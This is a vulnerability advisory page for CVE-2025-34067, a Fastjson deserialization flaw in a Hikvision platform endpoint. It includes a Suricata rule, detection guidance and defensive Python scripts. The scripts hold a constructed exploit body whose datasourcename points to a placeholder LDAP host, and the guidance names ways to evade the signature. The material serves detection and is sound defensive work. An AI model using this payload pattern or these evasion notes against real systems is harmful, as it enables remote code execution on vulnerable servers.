CVE-2025-34067
published 2025-07-02

Priority: P1 (89) · critical · CVSS 4.0 base score: 10

In the wild: listed in VulnCheck KEV (exploited in the wild)
EPSS: 18.67% (96.9th percentile)
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.

Affected (1 range)

Vendor: hikvision
Product: integrated_security_management_platform
Version range: not given on this page
Fixed in: not given on this page

Detection & IOCs (extracted from sources)

url/path: /bic/ssoService/v1/applyCT
snort/suricata rule:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:26; content:"/bic/ssoService/v1/applyCT"; fast_pattern; http.request_body; content:"|22|datasourcename|22|"; content:"|22|ldap|3a 2f 2f|"; within:15; reference:url,www.sentinelone.com/vulnerability-database/cve-2025-34067/; reference:cve,2025-34067; classtype:attempted-admin; sid:2068368; rev:1; metadata:affected_product HikVision, attack_target Networking_Equipment, tls_state plaintext, created_at 2026_03_20, cve CVE_2025_34067, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2026_03_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes: |22|datasourcename|22| followed by |22|ldap|3a 2f 2f| within:15 (0x22 is the double quote and 3a 2f 2f is "://", so the request body must contain "datasourcename" followed within 15 bytes by the opening quote of an ldap:// URL)
  • Look for HTTP POST requests to the exact URI /bic/ssoService/v1/applyCT (the rule pins the URI buffer to exactly 26 bytes with bsize:26); this is the vulnerable deserialization endpoint.
  • Inspect POST request bodies for the JSON key "datasourcename" followed within 15 bytes by an LDAP URL ("ldap://"); this is the Fastjson auto-type payload pattern used to make the server load a remote class.
  • Exploitation was observed in the wild as early as 2025-02-05 UTC, so treat any hit on this signature as a high-confidence exploitation attempt rather than generic scanning; whether the attempt succeeded is established by the outbound callback described below, not by the inbound request alone.
  • Scanning and exploitation attempts against CVE-2025-34067 have been attributed to Iran-nexus threat actors using commercial VPN exit nodes (Mullvad, ProtonVPN, Surfshark, NordVPN) and VPS infrastructure; correlate source IPs against those VPN egress ranges.
  • Monitor for Hikvision Integrated Security Management Platform hosts initiating unexpected outbound LDAP connections: a successful exploit makes the server resolve the attacker-controlled LDAP URL (a JNDI lookup), and the class referenced by the LDAP response is then typically fetched from a codebase URL, often over HTTP. The attacker's LDAP listener need not sit on port 389, so alert on the platform host contacting unexpected external destinations on any port, not only on LDAP ports.
  • The Snort/Suricata rule SID 2068368 (ET, rev:1, created 2026-03-20) directly detects this exploit pattern and should be deployed on both perimeter and internal sensors.
  • The rule only fires on plaintext (non-TLS) traffic (tls_state plaintext); if the platform is deployed behind TLS termination or a reverse proxy, the rule will not trigger on the encrypted leg, and inspection has to happen at or behind the TLS termination point.
  • The URI match uses an exact byte-size constraint (bsize:26) and the body contents are case-sensitive literals; URL encoding, a path prefix added by a proxy, or proxy rewriting of the URI can bypass this specific signature, so treat it as a high-precision rather than a high-recall control.
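The signature bullets above map onto a small detector. The following is an added example (my code, not the vendor's, Proofpoint ET's or this page's) that re-implements the matching logic of SID 2068368 in Python next to a normalized variant and runs both over constructed HTTP requests, so the bsize:26, case-sensitivity and proxy-prefix caveats can be seen side by side. The sample requests, the 203.0.113.7 address and the com.example class name are constructed placeholders, not a real gadget or real infrastructure; the `within:15` interpretation follows Suricata semantics (the second content must end within 15 bytes of the end of the first).

```python
"""Literal vs. normalized matching for the applyCT exploit pattern.

Added example: not code from Hikvision, Proofpoint ET or the page. It
re-implements SID 2068368 as written, then a looser detector, and runs both
over constructed requests. Addresses (TEST-NET-3) and class names
(com.example) are placeholders.
"""
import re
from urllib.parse import unquote

APPLYCT_URI = "/bic/ssoService/v1/applyCT"  # 26 bytes, which is what bsize:26 pins

# Rule body logic: content:"|22|datasourcename|22|" then content:"|22|ldap|3a 2f 2f|"
# within:15. In Suricata `within:N` means the second match must END within N
# bytes of the end of the first; `"ldap://` is 8 bytes, so at most 7 bytes may
# separate the key from the URL (`:` or `: ` in ordinary JSON).
LITERAL_BODY_RE = re.compile(rb'"datasourcename".{0,7}"ldap://', re.DOTALL)
# Looser variant: the rule's contents are case-sensitive literals; this one
# ignores key case and allows any whitespace around the colon.
LOOSE_BODY_RE = re.compile(rb'"datasourcename"\s*:\s*"ldap://', re.IGNORECASE)


def literal_rule_match(method: str, uri: str, body: bytes) -> bool:
    """Approximates the rule as written: POST, URI buffer exactly 26 bytes
    containing the applyCT path (bsize:26 + content), then the two body
    contents in order under the within:15 constraint."""
    if method != "POST":
        return False
    raw = uri.encode()
    if len(raw) != 26 or APPLYCT_URI.encode() not in raw:
        return False
    return LITERAL_BODY_RE.search(body) is not None


def normalized_match(method: str, uri: str, body: bytes) -> bool:
    """Same indicators after normalization: percent-decode the path, drop
    any query string, tolerate a reverse-proxy prefix, ignore key case."""
    path = unquote(uri.split("?", 1)[0])
    if method.upper() != "POST" or not path.endswith(APPLYCT_URI):
        return False
    return LOOSE_BODY_RE.search(body) is not None


def extract_ldap_targets(body: bytes) -> list:
    """host[:port] of every ldap:// URL in the body; hand these to egress
    monitoring to check whether the JNDI callback actually happened."""
    return [m.decode() for m in re.findall(rb'ldap://([^/"\s]+)', body, re.IGNORECASE)]


# Constructed payloads: placeholder class name, TEST-NET-3 callback address.
PAYLOAD = (b'{"@type":"com.example.NotARealGadget",'
           b'"datasourcename":"ldap://203.0.113.7:1389/obj"}')
PAYLOAD_MIXED_CASE = PAYLOAD.replace(b'"datasourcename"', b'"dataSourceName"')

# Constructed requests (name, method, raw URI, body); none captured from a host.
SAMPLE_REQUESTS = [
    ("exact",        "POST", "/bic/ssoService/v1/applyCT",     PAYLOAD),
    ("url-encoded",  "POST", "/bic/ssoService/v1/%61pplyCT",   PAYLOAD),
    ("proxy-prefix", "POST", "/vms/bic/ssoService/v1/applyCT", PAYLOAD),
    ("key-case",     "POST", "/bic/ssoService/v1/applyCT",     PAYLOAD_MIXED_CASE),
    ("benign",       "POST", "/bic/ssoService/v1/applyCT",
     b'{"username":"ops","datasourcename":"hikcentral-db"}'),
    ("get-probe",    "GET",  "/bic/ssoService/v1/applyCT",     b""),
]


def triage(requests=SAMPLE_REQUESTS) -> dict:
    """Return {name: (literal_rule_hit, normalized_hit, ldap_targets)}."""
    out = {}
    for name, method, uri, body in requests:
        out[name] = (literal_rule_match(method, uri, body),
                     normalized_match(method, uri, body),
                     extract_ldap_targets(body))
    return out


if __name__ == "__main__":
    for name, (lit, norm, targets) in triage().items():
        print(f"{name:13} rule={lit!s:5} normalized={norm!s:5} ldap={targets}")
```

Only the "exact" request trips the literal rule; the encoded, prefixed and mixed-case variants are caught only by the normalized detector, and the benign applyCT request (no ldap:// value) and the GET probe trip neither. The extracted callback target is what you pass to the egress check.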
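To tell an attempt from a success, the outbound-callback bullet above needs an egress-side check. This added example (not vendor or page code) parses constructed firewall log lines and lists every connection a platform host initiated to a destination outside assumed RFC 1918 ranges, classifying the standard LDAP ports and the HTTP ports where the class referenced by an LDAP reply is usually served. The log format, the host inventory and the addresses are constructed for the example; adapt the regex to your firewall's export.

```python
"""Egress-side confirmation of the JNDI callback.

Added example: not Hikvision or page code. Lists platform-host connections
to non-internal destinations from constructed firewall logs. Format, host
inventory and addresses are invented for the example.
"""
import ipaddress
import re

# Constructed format: "<ts> <fw> <action> <proto> <src>:<sport> -> <dst>:<dport>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<fw>\S+) (?P<action>\S+) (?P<proto>\S+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")

PLATFORM_HOSTS = {"10.20.30.40"}           # assumed inventory of ISMP servers
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]  # assumed
LDAP_PORTS = {389, 636}

# Constructed log lines: internal AD lookup, external LDAP + HTTP from the
# platform host, a workstation doing LDAP, and a blocked callback on 1389.
SAMPLE_LOG = """\
2025-02-05T03:14:07Z fw01 allow tcp 10.20.30.40:51234 -> 10.0.0.5:389
2025-02-05T03:14:09Z fw01 allow tcp 10.20.30.40:51240 -> 203.0.113.7:389
2025-02-05T03:14:10Z fw01 allow tcp 10.20.30.40:51241 -> 203.0.113.7:8080
2025-02-05T03:14:11Z fw01 allow tcp 10.20.30.99:40001 -> 203.0.113.7:389
2025-02-05T03:14:12Z fw01 deny tcp 10.20.30.40:51242 -> 198.51.100.9:1389
""".splitlines()


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify(dport: int) -> str:
    if dport in LDAP_PORTS:
        return "ldap"
    if dport in (80, 8080, 443):
        return "http"   # class fetch from the codebase named in the LDAP reply
    return "other"      # JNDI listeners often use arbitrary ports such as 1389


def find_callbacks(lines, platform_hosts=PLATFORM_HOSTS):
    """Return [(ts, src, dst, dport, kind, action)] for platform-host egress
    to non-internal destinations. Denied attempts are kept on purpose: a
    blocked callback still proves the deserialization reached the lookup."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["src"] not in platform_hosts:
            continue
        if is_internal(m["dst"]):
            continue  # directory and database traffic stays inside
        dport = int(m["dport"])
        hits.append((m["ts"], m["src"], m["dst"], dport, classify(dport), m["action"]))
    return hits


def callback_hosts(hits) -> list:
    """Distinct external hosts contacted; compare against the ldap:// targets
    seen in inbound applyCT requests to close the loop."""
    return sorted({h[2] for h in hits})


if __name__ == "__main__":
    for hit in find_callbacks(SAMPLE_LOG):
        print(hit)
```

The internal LDAP lookup and the workstation's traffic are ignored; the two connections to 203.0.113.7 and the denied one to 198.51.100.9:1389 are reported, the last one under "other" because the attacker's listener port is not predictable.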

CVSS provenance

NVD: CVSS 4.0, 10.0 CRITICAL, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
VulnCheck: 10.0 CRITICAL